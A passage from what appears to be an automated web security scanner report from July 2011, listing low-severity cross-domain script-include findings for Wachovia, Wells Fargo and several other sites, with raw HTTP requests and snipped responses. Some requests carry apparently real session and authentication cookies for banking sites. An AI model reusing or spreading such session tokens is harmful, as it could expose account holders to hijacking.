Cookie: TLTSID=95209782B1EC10B13497C08483F0D444; originalReferrer=; s_pers=%20s_visit%3D1%7C1311070855180%3B%20s_ev33%3D%255B%255B%2527Direct%252520Load%2527%252C%25271311069055183%2527%255D%255D%7C1468921855183%3B%20s_nr%3D1311069112331-New%7C1342605112331%3B; s_sess=%20s_Online%252BBanking/BillPay%252BEnrollment%252BOverviewevent6%3Devent6%3B%20s_cc%3Dtrue%3B%20s_prod%3D%253BOnline%252BBanking/BillPay%252BEnrollment%252BOverview%3B%20s_var_19%3DOnline%252BBanking/BillPay%252BEnrollment%252BOverview%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20SC_LINKS%3D/Wachovia%2520Miscellaneous/Home/Forgot%2520Password%255E%255EReset%2520your%2520password%255E%255E/Wachovia%2520Miscellaneous/Home/Forgot%2520Password%2520%257C%2520Reset%2520your%2520password%255E%255E%3B%20s_sq%3Dwachoviaglobal%252Cwachovialive%253D%252526pid%25253D/Wachovia%25252520Miscellaneous/Home/Forgot%25252520Password%252526pidt%25253D1%252526oid%25253Dhttps%2525253A//onlineservices.wachovia.com/identity/IdentityMgr%2525253Faction%2525253DsecondaryPresentLogin%25252526nextpage%2525253DPW_1%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; JSESSIONID=0001Rg3HY5HUmbK3eRI48SeteTO:10tep658j; AuthSvsSessionID=VeEXlj/ayWy1Ar58/R0Qxuw/xWw=56 4N.izwPc9T9UdpNwJyhhyDgtgrr.649446; CookiesAreEnabled=yes

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 09:52:56 GMT
Server: IBM_HTTP_Server
Cache-Control: no-store
Pragma: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
x-frames-option: deny
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Content-Length: 18355

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--


-->
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
...[SNIP]...
<link href="https://a248.e.akamai.net/f/248/34582/7d/onlineservices.wachovia.com/ols/css/handheld.css" rel="stylesheet" type="text/css" media="handheld" />


   <script type="text/javascript" language="JavaScript1.2" src="https://a248.e.akamai.net/f/248/34586/7d/www.wachovia.com/onlineservices/help/js/RoboHelp_CSH.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="https://a248.e.akamai.net/f/248/34582/7d/onlineservices.wachovia.com/ols/js/bidata.js"></script>
...[SNIP]...
</script>

   
   <script type="text/javascript" language="JavaScript1.2" src="https://a248.e.akamai.net/f/248/34586/7d/www.wachovia.com/metrics/component/0,,40_25,00.js"></script>
...[SNIP]...
<!-- end Site Catalyst -->

<script type="text/javascript" language="JavaScript1.2" defer="defer" src="https://a248.e.akamai.net/f/248/34586/7d/www.wachovia.com/metrics/stats.js"></script>
...[SNIP]...

15.3. https://wellsoffice.wellsfargo.com/ceoportal/signon/index.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://wellsoffice.wellsfargo.com
Path:   /ceoportal/signon/index.jsp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /ceoportal/signon/index.jsp?TYPE=33554433&REALMOID=06-3a718f7c-1c9d-0019-0000-6b5800006b58&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=nQv7GGyWUMf3GogDceQgLNkheYYCBKvmyZclEoI8LpvnPyAtYAwhziS4s5RAFbbT&TARGET=$SM$https%3a%2f%2fwellsoffice%2ewellsfargo%2ecom%2f HTTP/1.1
Host: wellsoffice.wellsfargo.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=403C6448D3FA27DB; wfacookie=B-20110719024057407636411; OB_SO_ORIGIN=source%3Dhomepage; WFHOME=PER; wcmcookiesrh=n8cLTlRYjNyY5JJqwHkVryJ5zCn2Zd0wy2JnfSBfWQRhp8dP86sl!2080519142; wcmcookiewf=MlB2TlRHtlpNMhhlQQWLnngW4x5GhPs9TMCyCTHbRHNBQ1M202g6!2080519142; TCID=0007b089-750d-8c50-be96-e99900000049; NSC_XfmmtGbshp4=445b32067863; TLTSID=687AC65EB1EB10B1991EF87992750532

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 09:42:27 GMT
Content-type: text/html; charset=UTF-8
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 15241


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!
...[SNIP]...
</form>


<script type="text/javascript" src="https://a248.e.akamai.net/6/248/3583/000/wellsoffice.wellsfargo.com/ceoportal/DocumentumRepository/content/wria/1.3.1-sp1/jslib/wria-min.js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="https://a248.e.akamai.net/6/248/3583/000/wellsoffice.wellsfargo.com/ceoportal/framework/skins/default/js/CEOP.SignonHelper.js"></script>
<script type="text/javascript" src="https://a248.e.akamai.net/6/248/3583/000/wellsoffice.wellsfargo.com/ceoportal/framework/skins/default/js/CEOP.BookmarksChooser.js"></script>
<script type="text/javascript" src="https://a248.e.akamai.net/6/248/3583/000/wellsoffice.wellsfargo.com/ceoportal/framework/skins/default/js/CEOP.PMFP.js"></script>
...[SNIP]...

15.4. http://www.defaultroute.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.defaultroute.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.defaultroute.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 01:59:45 GMT
Server: Apache
X-Powered-By: PHP/5.3.2
X-Pingback: http://www.defaultroute.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Content-Length: 12931

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- putting fonts here bec
...[SNIP]...
<link rel="shortcut icon" href="http://www.defaultroute.com/wp-content/themes/dr_oct_2010/images/favicon.ico" type="image/x-icon" />
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script src="http://cdn.jquerytools.org/1.2.5/jquery.tools.min.js"></script>
...[SNIP]...

15.5. http://www.defaultroute.com/category/founders/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.defaultroute.com
Path:   /category/founders/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /category/founders/ HTTP/1.1
Host: www.defaultroute.com
Proxy-Connection: keep-alive
Referer: http://www.defaultroute.com/services/thenetwork/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=152370604.79046687.1311040794.1311040794.1311040794.1; __utmb=152370604.2.10.1311040794; __utmc=152370604; __utmz=152370604.1311040794.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 02:00:46 GMT
Server: Apache
X-Powered-By: PHP/5.3.2
X-Pingback: http://www.defaultroute.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Content-Length: 10607

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- putting fonts here bec
...[SNIP]...
<link rel="shortcut icon" href="http://www.defaultroute.com/wp-content/themes/dr_oct_2010/images/favicon.ico" type="image/x-icon" />
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script src="http://cdn.jquerytools.org/1.2.5/jquery.tools.min.js"></script>
...[SNIP]...

15.6. http://www.defaultroute.com/services/thenetwork/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.defaultroute.com
Path:   /services/thenetwork/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /services/thenetwork/ HTTP/1.1
Host: www.defaultroute.com
Proxy-Connection: keep-alive
Referer: http://www.defaultroute.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=152370604.79046687.1311040794.1311040794.1311040794.1; __utmb=152370604.1.10.1311040794; __utmc=152370604; __utmz=152370604.1311040794.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 02:00:18 GMT
Server: Apache
X-Powered-By: PHP/5.3.2
X-Pingback: http://www.defaultroute.com/xmlrpc.php
Link: <http://www.defaultroute.com/?p=567>; rel=shortlink
Content-Type: text/html; charset=UTF-8
Content-Length: 10570

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- putting fonts here bec
...[SNIP]...
<link rel="shortcut icon" href="http://www.defaultroute.com/wp-content/themes/dr_oct_2010/images/favicon.ico" type="image/x-icon" />
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script src="http://cdn.jquerytools.org/1.2.5/jquery.tools.min.js"></script>
...[SNIP]...

15.7. http://www.healthcentral.com/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/feeling-low-self-worth/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.healthcentral.com
Path:   /adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/feeling-low-self-worth/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/feeling-low-self-worth/ HTTP/1.1
Host: www.healthcentral.com
Proxy-Connection: keep-alive
Referer: http://www.healthcentral.com/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/hypersensitivity-to-noise-touch-smell/?ap=825
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2712441205010785-60000115803F0F69[CE]; CONCRETE5=7e3f03933c1bb0d06b1d5726e207837d; c_search=_search; s_cc=true; s_sq=cmi-choicemediacom%3D%2526pid%253DVerticals%252520%25253E%252520ADHD%252520%25253E%252520Slideshows%252520%25253E%252520Common%252520Symptoms%252520of%252520ADD%252520%252526%252520ADHD%252520in%252520Women%252520%25253E%252520Hypersensitivity%252520to%252520Noise%25252C%252520Touch%252520%252526%252520Smell%2526pidt%253D1%2526oid%253Dhttp%25253A//www.healthcentral.com/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/hypersensit%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.1.6
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Tue, 19 Jul 2011 01:58:54 GMT
Date: Tue, 19 Jul 2011 01:58:54 GMT
Content-Length: 36637
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html>
<head>

<title>Feeling Low Self-Worth - Common Symptoms of ADD & ADHD in Women - ADHD</titl
...[SNIP]...
<link rel="stylesheet" type="text/css"
       href="http://www.healthcentral.com/common/cf/themes/hctemplate/ui/lib/jcarousel/skins/hc/skin.css" />
   <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.5.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
</div><script type="text/javascript"
   src="http://s7.addthis.com/js/250/addthis_widget.js#username=healthcentral">
</script>
...[SNIP]...
</script><script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.1/scriptaculous.js?load=effects,controls" type="text/javascript"></script>
...[SNIP]...

15.8. http://www.healthcentral.com/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/hypersensitivity-to-noise-touch-smell/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.healthcentral.com
Path:   /adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/hypersensitivity-to-noise-touch-smell/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/hypersensitivity-to-noise-touch-smell/?ap=825 HTTP/1.1
Host: www.healthcentral.com
Proxy-Connection: keep-alive
Referer: http://paid.outbrain.com/network/redir?key=ea083f1f0a8664e17286dd018ebbd632&rdid=218341001&type=CAD_def_prd&in-site=false&pc_id=3389484&req_id=21fd5e9603ad3d38cc44a355febaf417&agent=blog_JS_rec&recMode=4&reqType=1&wid=1&imgType=0&version=40317&idx=6
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2712441205010785-60000115803F0F69[CE]

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.1.6
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Tue, 19 Jul 2011 01:59:05 GMT
Date: Tue, 19 Jul 2011 01:59:05 GMT
Content-Length: 36632
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html>
<head>

<title>Common Symptoms of ADD & ADHD in Women - ADHD</title>
<META http-equiv="Con
...[SNIP]...
<link rel="stylesheet" type="text/css"
       href="http://www.healthcentral.com/common/cf/themes/hctemplate/ui/lib/jcarousel/skins/hc/skin.css" />
   <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.5.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
</div><script type="text/javascript"
   src="http://s7.addthis.com/js/250/addthis_widget.js#username=healthcentral">
</script>
...[SNIP]...
</script><script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.1/scriptaculous.js?load=effects,controls" type="text/javascript"></script>
...[SNIP]...

15.9. http://www.healthcentral.com/common/js/healthcentral_common.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.healthcentral.com
Path:   /common/js/healthcentral_common.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /common/js/healthcentral_common.js HTTP/1.1
Host: www.healthcentral.com
Proxy-Connection: keep-alive
Referer: http://www.healthcentral.com/adhd/cf/slideshows/common-symptoms-of-add-and-adhd-in-women/hypersensitivity-to-noise-touch-smell/?ap=825
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2712441205010785-60000115803F0F69[CE]; CONCRETE5=7e3f03933c1bb0d06b1d5726e207837d
If-None-Match: "9c05a-642a-4a820f19f2040"-gzip
If-Modified-Since: Fri, 15 Jul 2011 19:49:13 GMT

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Fri, 15 Jul 2011 19:50:43 GMT
ETag: "5b806c-642a-4a820f6fc6ac0"-gzip
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 25642
Content-Type: application/x-javascript
Cache-Control: max-age=60
Date: Tue, 19 Jul 2011 01:58:21 GMT
Connection: close

document.write('<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"><\/script><script type="text/javascript" src="http://www.healthcentral.com/common
...[SNIP]...

15.10. http://www.rockhall.co.uk/ContactStyles  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rockhall.co.uk
Path:   /ContactStyles

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /ContactStyles HTTP/1.1
Host: www.rockhall.co.uk
Proxy-Connection: keep-alive
Referer: http://www.rockhall.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SN4b16ef86c8fd5=r42ahk9qusvos2hgeufe2nngi5

Response

HTTP/1.1 404 Not Found
Date: Tue, 19 Jul 2011 01:59:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.17
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Cache-Control: private, must-revalidate
Set-Cookie: SN4b16ef86c8fd5=r42ahk9qusvos2hgeufe2nngi5; path=/
Content-Type: text/html; charset=UTF-8
Content-Length: 13086

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Rock Hall Ltd - HP
...[SNIP]...
<div class="twitter">
<script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...

15.11. http://www.rockhall.co.uk/assets/templates/rockhall/fonts/goontwcn-webfont.woff  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rockhall.co.uk
Path:   /assets/templates/rockhall/fonts/goontwcn-webfont.woff

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /assets/templates/rockhall/fonts/goontwcn-webfont.woff HTTP/1.1
Host: www.rockhall.co.uk
Proxy-Connection: keep-alive
Referer: http://www.rockhall.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SN4b16ef86c8fd5=r42ahk9qusvos2hgeufe2nngi5

Response

HTTP/1.1 404 Not Found
Date: Tue, 19 Jul 2011 01:59:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.17
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Cache-Control: private, must-revalidate
Set-Cookie: SN4b16ef86c8fd5=r42ahk9qusvos2hgeufe2nngi5; path=/
Content-Type: text/html; charset=UTF-8
Content-Length: 13086

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Rock Hall Ltd - HP
...[SNIP]...
<div class="twitter">
<script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...

15.12. http://www.rockhall.co.uk/assets/templates/rockhall/fonts/gotwtw__-webfont.woff  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rockhall.co.uk
Path:   /assets/templates/rockhall/fonts/gotwtw__-webfont.woff

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /assets/templates/rockhall/fonts/gotwtw__-webfont.woff HTTP/1.1
Host: www.rockhall.co.uk
Proxy-Connection: keep-alive
Referer: http://www.rockhall.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SN4b16ef86c8fd5=r42ahk9qusvos2hgeufe2nngi5

Response

HTTP/1.1 404 Not Found
Date: Tue, 19 Jul 2011 01:59:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.17
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Cache-Control: private, must-revalidate
Set-Cookie: SN4b16ef86c8fd5=r42ahk9qusvos2hgeufe2nngi5; path=/
Content-Type: text/html; charset=UTF-8
Content-Length: 13086

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Rock Hall Ltd - HP
...[SNIP]...
<div class="twitter">
<script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...

15.13. http://www.rockhall.co.uk/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rockhall.co.uk
Path:   /favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /favicon.ico HTTP/1.1
Host: www.rockhall.co.uk
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SN4b16ef86c8fd5=r42ahk9qusvos2hgeufe2nngi5; __utma=142083889.1618751484.1311040809.1311040809.1311040809.1; __utmb=142083889.1.10.1311040809; __utmc=142083889; __utmz=142083889.1311040809.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Date: Tue, 19 Jul 2011 02:00:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.17
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Cache-Control: private, must-revalidate
Set-Cookie: SN4b16ef86c8fd5=r42ahk9qusvos2hgeufe2nngi5; path=/
Content-Type: text/html; charset=UTF-8
Content-Length: 13086

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Rock Hall Ltd - HP
...[SNIP]...
<div class="twitter">
<script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...

15.14. http://www.rockhall.co.uk/hp-compaq-ibm-cisco-dell-asset-recovery-recycling-weee-disposal.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rockhall.co.uk
Path:   /hp-compaq-ibm-cisco-dell-asset-recovery-recycling-weee-disposal.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /hp-compaq-ibm-cisco-dell-asset-recovery-recycling-weee-disposal.html HTTP/1.1
Host: www.rockhall.co.uk
Proxy-Connection: keep-alive
Referer: http://www.rockhall.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=142083889.1618751484.1311040809.1311040809.1311040809.1; __utmb=142083889.1.10.1311040809; __utmc=142083889; __utmz=142083889.1311040809.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SN4b16ef86c8fd5=r42ahk9qusvos2hgeufe2nngi5

Response

HTTP/1.1 200 OK
Cache-Control: private, must-revalidate
Date: Tue, 19 Jul 2011 02:00:55 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.17
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Set-Cookie: SN4b16ef86c8fd5=r42ahk9qusvos2hgeufe2nngi5; path=/
Vary: Accept-Encoding
Content-Length: 9530

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Obsolete IT equipme
...[SNIP]...
<div class="twitter">
<script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...

15.15. https://www.wellsfargo.com/locator/atm/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /locator/atm/search

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /locator/atm/search?txtCity=&selState=&user=wb&txtZip1=10010 HTTP/1.1
Host: www.wellsfargo.com
Connection: keep-alive
Referer: https://www.wachovia.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=403C6448D3FA27DB; wfacookie=B-20110719024057407636411; WFHOME=PER; wcmcookiesrh=n8cLTlRYjNyY5JJqwHkVryJ5zCn2Zd0wy2JnfSBfWQRhp8dP86sl!2080519142; ISD_WCM_COOKIE=1380064266.16927.0000; wcmcookiewf=MlB2TlRHtlpNMhhlQQWLnngW4x5GhPs9TMCyCTHbRHNBQ1M202g6!2080519142; JSESSIONID=B284C92801BBB527ED6675DA0225B0AC; TLTSID=687AC65EB1EB10B1991EF87992750532; WL_CEOPORTAL=df2DTlRD23r6D8hM4JvW12QGSpyHqGCXkLJLRcS3lNh39NGQnXWn!1641303941; wcmcookieloc=yhG8TlSN83dtt298TbbLKtvdp1WmHLyTw755NPpLJVz1pLvr1x01!2080519142; COOKIE_SID=DyGGTlSG1XHBTfQxYQLGYXYLN92TmHhyhQyXH5nJv3gvTfnwbhdn!1611335114; ISD_DAS_COOKIE=GOgImdr3ksrLji0ECVSJBME8iwgBVBsj4F1X9LJJ4rmio2jDIGgSZrvlkCN4zIGXLfSKMZ4MlmG49VA=; OB_SO_ORIGIN=source=alternate; TCID=0007b089-750d-8c50-be96-e99900000049; NSC_XfmmtGbshp4=445b32067863

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Tue, 19 Jul 2011 09:51:23 GMT
Content-type: text/html; charset=ISO-8859-1
Content-Length: 30236


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">


<head>
...[SNIP]...
<div id="contentCol">
       

<script type="text/javascript" src="https://ecn.dev.virtualearth.net/mapcontrol/mapcontrol.ashx?v=6.2&mkt=en-us&s=1"></script>
...[SNIP]...

15.16. https://www.wellsfargoadvisors.com/online-access/signon.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargoadvisors.com
Path:   /online-access/signon.htm

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /online-access/signon.htm HTTP/1.1
Host: www.wellsfargoadvisors.com
Connection: keep-alive
Referer: https://www.wellsfargoadvisors.com/conversion/signon-decision.htm
